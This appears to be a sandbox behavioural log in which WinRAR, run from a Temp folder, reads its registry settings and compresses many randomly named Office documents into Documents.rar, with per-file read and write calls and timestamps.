Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SeparateArcDoubleExt, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SeparateArcSubfolders, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = EmailArcTo, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = PackDetails, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\Crypt32.dll, base_address = 0x7fefdc00000 True 1
Fn
Module Get Address module_name = c:\windows\system32\crypt32.dll, function = CryptProtectMemory, address_out = 0x7fefdc316f8 True 1
Fn
Module Get Address module_name = c:\windows\system32\crypt32.dll, function = CryptUnprotectMemory, address_out = 0x7fefdc3171c True 1
Fn
File Get Info filename = Documents, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\Documents\Documents, type = file_attributes False 1
Fn
File Get Info filename = Documents.rar, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\Documents\Documents.rar, type = file_attributes False 1
Fn
File Get Info filename = Documents.zip, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\Documents\Documents.zip, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Compression False 1
Fn
File Create filename = Documents.rar, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = \\?\C:\Users\WhuOXYsD\Documents\Documents.rar, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = Documents.rar, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\Documents\Documents.rar, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes, value_name = ActivePath, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\Themes, type = file_attributes False 1
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\Themes, type = file_attributes False 1
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes, value_name = ShellExtBMP, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes, value_name = ShellExtIcon, size = 2, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList False 1
Window Create class_name = SysListView32, wndproc_parameter = 0 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList False 6
System Get Info type = Operating System True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths False 9
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnStates False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnStates False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnStates False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnStates False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnStates False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnStates False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnStates False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnStates False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnStates False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnStates False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
File Get Info filename = Documents.rar, type = file_attributes False 1
File Get Info filename = \\?\C:\Users\WhuOXYsD\Documents\Documents.rar, type = file_attributes False 1
System Get Time type = Performance Ctr, time = 12901208574 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface, value_name = SystemProgressBar, data = 1, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Interface, value_name = TaskbarProgressBar, data = 1, type = REG_NONE False 1
Window Create class_name = tooltips_class32, wndproc_parameter = 0 True 1
Window Create class_name = tooltips_class32, wndproc_parameter = 0 True 1
System Get Time type = Ticks, time = 10896545 True 1
System Get Time type = Ticks, time = 10896545 True 1
System Get Time type = Ticks, time = 10896560 True 1
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
File Get Info filename = My Music, type = file_attributes True 1
File Get Info filename = My Pictures, type = file_attributes True 1
File Get Info filename = My Videos, type = file_attributes True 1
System Get Time type = Ticks, time = 10896560 True 1
System Get Time type = Ticks, time = 10896560 True 1
System Get Time type = Ticks, time = 10896560 True 1
System Get Time type = Ticks, time = 10896560 True 1
System Get Time type = Ticks, time = 10896638 True 1
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x77ae0000 True 1
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = CompareStringOrdinal, address_out = 0x77afd720 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:17 (UTC) True 1
System Get Time type = Performance Ctr, time = 12927458107 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:17 (UTC) True 1
System Get Time type = Performance Ctr, time = 12927583358 True 1
File Create filename = Documents.rar, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
File Create filename = \\?\C:\Users\WhuOXYsD\Documents\Documents.rar, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
File Create filename = Documents.rar, desired_access = GENERIC_WRITE, GENERIC_READ True 1
System Get Time type = Ticks, time = 10896654 True 1
File Write filename = Documents.rar, size = 8 True 1
File Write filename = Documents.rar, size = 17 True 1
File Create filename = -Rh7mA95EzQMCjv.pptx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908432 True 1
System Get Time type = Performance Ctr, time = 14293281261 True 1
System Get Time type = Ticks, time = 10908447 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14300498529 True 1
File Read filename = -Rh7mA95EzQMCjv.pptx, size = 1048576, size_out = 41644 True 1
File Read filename = -Rh7mA95EzQMCjv.pptx, size = 1006932, size_out = 0 True 1
System Get Time type = Ticks, time = 10908525 True 1
System Get Time type = Performance Ctr, time = 14301568710 True 1
System Get Time type = Ticks, time = 10908525 True 1
System Get Time type = Ticks, time = 10908525 True 1
System Get Time type = Ticks, time = 10908525 True 1
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
System Get Time type = Ticks, time = 10908603 True 1
System Get Time type = Performance Ctr, time = 14310599580 True 1
System Get Time type = Ticks, time = 10908619 True 3
File Write filename = Documents.rar, size = 41744 True 1
File Write filename = Documents.rar, size = 104 True 1
File Create filename = 0eTc aT.pptx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908666 True 1
System Get Time type = Ticks, time = 10908666 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14316067883 True 1
File Read filename = 0eTc aT.pptx, size = 1048576, size_out = 101467 True 1
File Read filename = 0eTc aT.pptx, size = 947109, size_out = 0 True 1
System Get Time type = Ticks, time = 10908666 True 1
System Get Time type = Performance Ctr, time = 14316335233 True 1
System Get Time type = Ticks, time = 10908666 True 3
System Get Time type = Ticks, time = 10908697 True 1
System Get Time type = Performance Ctr, time = 14318681311 True 1
System Get Time type = Ticks, time = 10908697 True 3
File Write filename = Documents.rar, size = 101696 True 1
File Write filename = Documents.rar, size = 96 True 1
File Create filename = 0WMsLhv.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908697 True 1
System Get Time type = Ticks, time = 10908697 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14319638275 True 1
File Read filename = 0WMsLhv.docx, size = 1048576, size_out = 56780 True 1
File Read filename = 0WMsLhv.docx, size = 991796, size_out = 0 True 1
System Get Time type = Ticks, time = 10908713 True 1
System Get Time type = Performance Ctr, time = 14320079653 True 1
System Get Time type = Ticks, time = 10908713 True 4
System Get Time type = Performance Ctr, time = 14320563578 True 1
System Get Time type = Ticks, time = 10908713 True 3
File Write filename = Documents.rar, size = 56928 True 1
File Write filename = Documents.rar, size = 96 True 1
File Create filename = 0XuPmKuUcJqUgUNn.pptx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908713 True 1
System Get Time type = Ticks, time = 10908713 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14321184827 True 1
File Read filename = 0XuPmKuUcJqUgUNn.pptx, size = 1048576, size_out = 60489 True 1
File Read filename = 0XuPmKuUcJqUgUNn.pptx, size = 988087, size_out = 0 True 1
System Get Time type = Ticks, time = 10908713 True 1
System Get Time type = Performance Ctr, time = 14321421374 True 1
System Get Time type = Ticks, time = 10908713 True 3
System Get Time type = Ticks, time = 10908728 True 1
System Get Time type = Performance Ctr, time = 14321972592 True 1
System Get Time type = Ticks, time = 10908728 True 3
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
File Write filename = Documents.rar, size = 60608 True 1
File Write filename = Documents.rar, size = 105 True 1
File Create filename = 19uvJahSx.pptx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908728 True 1
System Get Time type = Ticks, time = 10908728 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14322609535 True 1
File Read filename = 19uvJahSx.pptx, size = 1048576, size_out = 12168 True 1
File Read filename = 19uvJahSx.pptx, size = 1036408, size_out = 0 True 1
System Get Time type = Ticks, time = 10908728 True 1
System Get Time type = Performance Ctr, time = 14322828928 True 1
System Get Time type = Ticks, time = 10908728 True 4
System Get Time type = Performance Ctr, time = 14323005459 True 1
System Get Time type = Ticks, time = 10908728 True 3
File Write filename = Documents.rar, size = 12208 True 1
File Write filename = Documents.rar, size = 98 True 1
File Create filename = 1dt_j0rkw.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908744 True 1
System Get Time type = Ticks, time = 10908744 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14323429322 True 1
File Read filename = 1dt_j0rkw.xlsx, size = 1048576, size_out = 63284 True 1
File Read filename = 1dt_j0rkw.xlsx, size = 985292, size_out = 0 True 1
System Get Time type = Ticks, time = 10908744 True 1
System Get Time type = Performance Ctr, time = 14323568552 True 1
System Get Time type = Ticks, time = 10908744 True 4
System Get Time type = Performance Ctr, time = 14324513009 True 1
System Get Time type = Ticks, time = 10908744 True 3
File Write filename = Documents.rar, size = 63408 True 1
File Write filename = Documents.rar, size = 98 True 1
File Create filename = 3gZT0e1Jc7KRhrNwc8F.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908759 True 1
System Get Time type = Ticks, time = 10908759 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14325008851 True 1
File Read filename = 3gZT0e1Jc7KRhrNwc8F.xlsx, size = 1048576, size_out = 6200 True 1
File Read filename = 3gZT0e1Jc7KRhrNwc8F.xlsx, size = 1042376, size_out = 0 True 1
System Get Time type = Ticks, time = 10908759 True 1
System Get Time type = Performance Ctr, time = 14325238312 True 1
System Get Time type = Ticks, time = 10908759 True 4
System Get Time type = Performance Ctr, time = 14325384927 True 1
System Get Time type = Ticks, time = 10908759 True 3
File Write filename = Documents.rar, size = 6240 True 1
File Write filename = Documents.rar, size = 106 True 1
File Create filename = 6_vMe3CazzKO.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908759 True 1
System Get Time type = Ticks, time = 10908759 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14325763207 True 1
File Read filename = 6_vMe3CazzKO.docx, size = 1048576, size_out = 6089 True 1
File Read filename = 6_vMe3CazzKO.docx, size = 1042487, size_out = 0 True 1
System Get Time type = Ticks, time = 10908759 True 1
System Get Time type = Performance Ctr, time = 14325867911 True 1
System Get Time type = Ticks, time = 10908759 True 4
System Get Time type = Performance Ctr, time = 14326007329 True 1
System Get Time type = Ticks, time = 10908759 True 3
File Write filename = Documents.rar, size = 6144 True 1
File Write filename = Documents.rar, size = 99 True 1
File Create filename = 9klODxiFKz0-WlOc t7.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908775 True 1
System Get Time type = Ticks, time = 10908775 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14326312529 True 1
File Read filename = 9klODxiFKz0-WlOc t7.xlsx, size = 1048576, size_out = 7995 True 1
File Read filename = 9klODxiFKz0-WlOc t7.xlsx, size = 1040581, size_out = 0 True 1
System Get Time type = Ticks, time = 10908775 True 1
System Get Time type = Performance Ctr, time = 14326410782 True 1
System Get Time type = Ticks, time = 10908775 True 4
System Get Time type = Performance Ctr, time = 14326561931 True 1
System Get Time type = Ticks, time = 10908775 True 3
File Write filename = Documents.rar, size = 8048 True 1
File Write filename = Documents.rar, size = 108 True 1
File Create filename = AE1NPe45_G.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908775 True 1
System Get Time type = Ticks, time = 10908775 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14326811152 True 1
File Read filename = AE1NPe45_G.xlsx, size = 1048576, size_out = 82290 True 1
File Read filename = AE1NPe45_G.xlsx, size = 966286, size_out = 0 True 1
System Get Time type = Ticks, time = 10908775 True 1
System Get Time type = Performance Ctr, time = 14326951642 True 1
System Get Time type = Ticks, time = 10908775 True 4
System Get Time type = Performance Ctr, time = 14327623325 True 1
System Get Time type = Ticks, time = 10908775 True 3
File Write filename = Documents.rar, size = 82496 True 1
File Write filename = Documents.rar, size = 99 True 1
File Create filename = atEaVS6T.pptx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908791 True 1
System Get Time type = Ticks, time = 10908791 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14328186110 True 1
File Read filename = atEaVS6T.pptx, size = 1048576, size_out = 85875 True 1
File Read filename = atEaVS6T.pptx, size = 962701, size_out = 0 True 1
System Get Time type = Ticks, time = 10908791 True 1
System Get Time type = Performance Ctr, time = 14328515181 True 1
System Get Time type = Ticks, time = 10908791 True 4
System Get Time type = Performance Ctr, time = 14329205879 True 1
System Get Time type = Ticks, time = 10908791 True 3
File Write filename = Documents.rar, size = 86080 True 1
File Write filename = Documents.rar, size = 97 True 1
File Create filename = AtQu0 xTj.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908806 True 1
System Get Time type = Ticks, time = 10908806 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14329806706 True 1
File Read filename = AtQu0 xTj.docx, size = 1048576, size_out = 12259 True 1
File Read filename = AtQu0 xTj.docx, size = 1036317, size_out = 0 True 1
System Get Time type = Ticks, time = 10908806 True 1
System Get Time type = Performance Ctr, time = 14330108118 True 1
System Get Time type = Ticks, time = 10908806 True 4
System Get Time type = Performance Ctr, time = 14330322194 True 1
System Get Time type = Ticks, time = 10908806 True 3
File Write filename = Documents.rar, size = 12304 True 1
File Write filename = Documents.rar, size = 98 True 1
File Create filename = aZCuN2.pptx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908806 True 1
System Get Time type = Ticks, time = 10908806 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14330707197 True 1
File Read filename = aZCuN2.pptx, size = 1048576, size_out = 22211 True 1
File Read filename = aZCuN2.pptx, size = 1026365, size_out = 0 True 1
System Get Time type = Ticks, time = 10908822 True 1
System Get Time type = Performance Ctr, time = 14330852620 True 1
System Get Time type = Ticks, time = 10908822 True 4
System Get Time type = Performance Ctr, time = 14331111320 True 1
System Get Time type = Ticks, time = 10908822 True 3
File Write filename = Documents.rar, size = 22304 True 1
File Write filename = Documents.rar, size = 95 True 1
File Create filename = buu1yiRA_xVu8tVc\hLAWY-nuLL.pptx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908822 True 1
System Get Time type = Ticks, time = 10908822 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14331451727 True 1
File Read filename = buu1yiRA_xVu8tVc\hLAWY-nuLL.pptx, size = 1048576, size_out = 74760 True 1
File Read filename = buu1yiRA_xVu8tVc\hLAWY-nuLL.pptx, size = 973816, size_out = 0 True 1
System Get Time type = Ticks, time = 10908822 True 1
System Get Time type = Performance Ctr, time = 14331610043 True 1
System Get Time type = Ticks, time = 10908822 True 4
System Get Time type = Performance Ctr, time = 14332238584 True 1
System Get Time type = Ticks, time = 10908822 True 3
File Write filename = Documents.rar, size = 74928 True 1
File Write filename = Documents.rar, size = 116 True 1
File Create filename = C8sP.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908837 True 1
System Get Time type = Ticks, time = 10908837 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14332823256 True 1
File Read filename = C8sP.docx, size = 1048576, size_out = 15090 True 1
File Read filename = C8sP.docx, size = 1033486, size_out = 0 True 1
System Get Time type = Ticks, time = 10908837 True 1
System Get Time type = Performance Ctr, time = 14333320549 True 1
System Get Time type = Ticks, time = 10908837 True 4
System Get Time type = Performance Ctr, time = 14333522208 True 1
System Get Time type = Ticks, time = 10908837 True 3
File Write filename = Documents.rar, size = 15120 True 1
File Write filename = Documents.rar, size = 93 True 1
File Create filename = Da5qX9dUi.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908837 True 1
System Get Time type = Ticks, time = 10908837 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14333793610 True 1
File Read filename = Da5qX9dUi.xlsx, size = 1048576, size_out = 87246 True 1
File Read filename = Da5qX9dUi.xlsx, size = 961330, size_out = 0 True 1
System Get Time type = Ticks, time = 10908853 True 1
System Get Time type = Performance Ctr, time = 14333998416 True 1
System Get Time type = Ticks, time = 10908853 True 4
System Get Time type = Performance Ctr, time = 14334716478 True 1
System Get Time type = Ticks, time = 10908853 True 3
File Write filename = Documents.rar, size = 87440 True 1
File Write filename = Documents.rar, size = 98 True 1
File Create filename = desktop.ini, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908853 True 1
System Get Time type = Ticks, time = 10908853 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14335194500 True 1
File Read filename = desktop.ini, size = 1048576, size_out = 402 True 1
File Read filename = desktop.ini, size = 1048174, size_out = 0 True 1
System Get Time type = Ticks, time = 10908853 True 1
System Get Time type = Performance Ctr, time = 14335493837 True 1
System Get Time type = Ticks, time = 10908853 True 1
System Get Time type = Ticks, time = 10908869 True 3
System Get Time type = Performance Ctr, time = 14335648009 True 1
System Get Time type = Ticks, time = 10908869 True 3
File Write filename = Documents.rar, size = 192 True 1
File Write filename = Documents.rar, size = 93 True 1
File Create filename = dPdybr639pwn.odp, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908869 True 1
System Get Time type = Ticks, time = 10908869 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14336039658 True 1
File Read filename = dPdybr639pwn.odp, size = 1048576, size_out = 24431 True 1
File Read filename = dPdybr639pwn.odp, size = 1024145, size_out = 0 True 1
System Get Time type = Ticks, time = 10908869 True 1
System Get Time type = Performance Ctr, time = 14336140208 True 1
System Get Time type = Ticks, time = 10908869 True 4
System Get Time type = Performance Ctr, time = 14336402372 True 1
System Get Time type = Ticks, time = 10908869 True 3
File Write filename = Documents.rar, size = 24512 True 1
File Write filename = Documents.rar, size = 100 True 1
File Create filename = e8 DbP8IuWCbGEcy.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908869 True 1
System Get Time type = Ticks, time = 10908869 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14336755340 True 1
File Read filename = e8 DbP8IuWCbGEcy.docx, size = 1048576, size_out = 74690 True 1
File Read filename = e8 DbP8IuWCbGEcy.docx, size = 973886, size_out = 0 True 1
System Get Time type = Ticks, time = 10908869 True 1
System Get Time type = Performance Ctr, time = 14336918258 True 1
System Get Time type = Ticks, time = 10908869 True 3
System Get Time type = Ticks, time = 10908884 True 1
System Get Time type = Performance Ctr, time = 14337531799 True 1
System Get Time type = Ticks, time = 10908884 True 3
File Write filename = Documents.rar, size = 74864 True 1
File Write filename = Documents.rar, size = 105 True 1
File Create filename = F-YPFV_qYj4bfRfXw9yB.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908884 True 1
System Get Time type = Ticks, time = 10908884 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14338027335 True 1
File Read filename = F-YPFV_qYj4bfRfXw9yB.docx, size = 1048576, size_out = 61040 True 1
File Read filename = F-YPFV_qYj4bfRfXw9yB.docx, size = 987536, size_out = 0 True 1
System Get Time type = Ticks, time = 10908884 True 1
System Get Time type = Performance Ctr, time = 14338310728 True 1
System Get Time type = Ticks, time = 10908884 True 4
System Get Time type = Performance Ctr, time = 14338863003 True 1
System Get Time type = Ticks, time = 10908900 True 3
File Write filename = Documents.rar, size = 61168 True 1
File Write filename = Documents.rar, size = 109 True 1
File Create filename = f7H1LR6Kr4.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908900 True 1
System Get Time type = Ticks, time = 10908900 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14339367552 True 1
File Read filename = f7H1LR6Kr4.xlsx, size = 1048576, size_out = 93702 True 1
File Read filename = f7H1LR6Kr4.xlsx, size = 954874, size_out = 0 True 1
System Get Time type = Ticks, time = 10908900 True 1
System Get Time type = Performance Ctr, time = 14339633629 True 1
System Get Time type = Ticks, time = 10908900 True 3
System Get Time type = Ticks, time = 10908915 True 1
System Get Time type = Performance Ctr, time = 14340398389 True 1
System Get Time type = Ticks, time = 10908915 True 3
File Write filename = Documents.rar, size = 93888 True 1
File Write filename = Documents.rar, size = 99 True 1
File Create filename = F_g z.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908915 True 1
System Get Time type = Ticks, time = 10908915 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14340904122 True 1
File Read filename = F_g z.xlsx, size = 1048576, size_out = 40566 True 1
File Read filename = F_g z.xlsx, size = 1008010, size_out = 0 True 1
System Get Time type = Ticks, time = 10908915 True 1
System Get Time type = Performance Ctr, time = 14341251916 True 1
System Get Time type = Ticks, time = 10908915 True 4
System Get Time type = Performance Ctr, time = 14341784608 True 1
System Get Time type = Ticks, time = 10908931 True 3
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
File Write filename = Documents.rar, size = 40688 True 1
File Write filename = Documents.rar, size = 94 True 1
File Create filename = G8MmJscBgVAAB6EEG8d0.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908931 True 1
System Get Time type = Ticks, time = 10908931 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14342331899 True 1
File Read filename = G8MmJscBgVAAB6EEG8d0.docx, size = 1048576, size_out = 22507 True 1
File Read filename = G8MmJscBgVAAB6EEG8d0.docx, size = 1026069, size_out = 0 True 1
System Get Time type = Ticks, time = 10908931 True 1
System Get Time type = Performance Ctr, time = 14342507676 True 1
System Get Time type = Ticks, time = 10908931 True 4
System Get Time type = Performance Ctr, time = 14342753010 True 1
System Get Time type = Ticks, time = 10908931 True 3
File Write filename = Documents.rar, size = 22592 True 1
File Write filename = Documents.rar, size = 109 True 1
File Create filename = GIwIhnYq\01ty5ZVjiFX.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10908947 True 1
System Get Time type = Ticks, time = 10908947 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
System Get Time type = Performance Ctr, time = 14343409518 True 1
File Read filename = GIwIhnYq\01ty5ZVjiFX.xlsx, size = 1048576, size_out = 59162 True 1
File Read filename = GIwIhnYq\01ty5ZVjiFX.xlsx, size = 989414, size_out = 0 True 1
System Get Time type = Ticks, time = 10908947 True 1
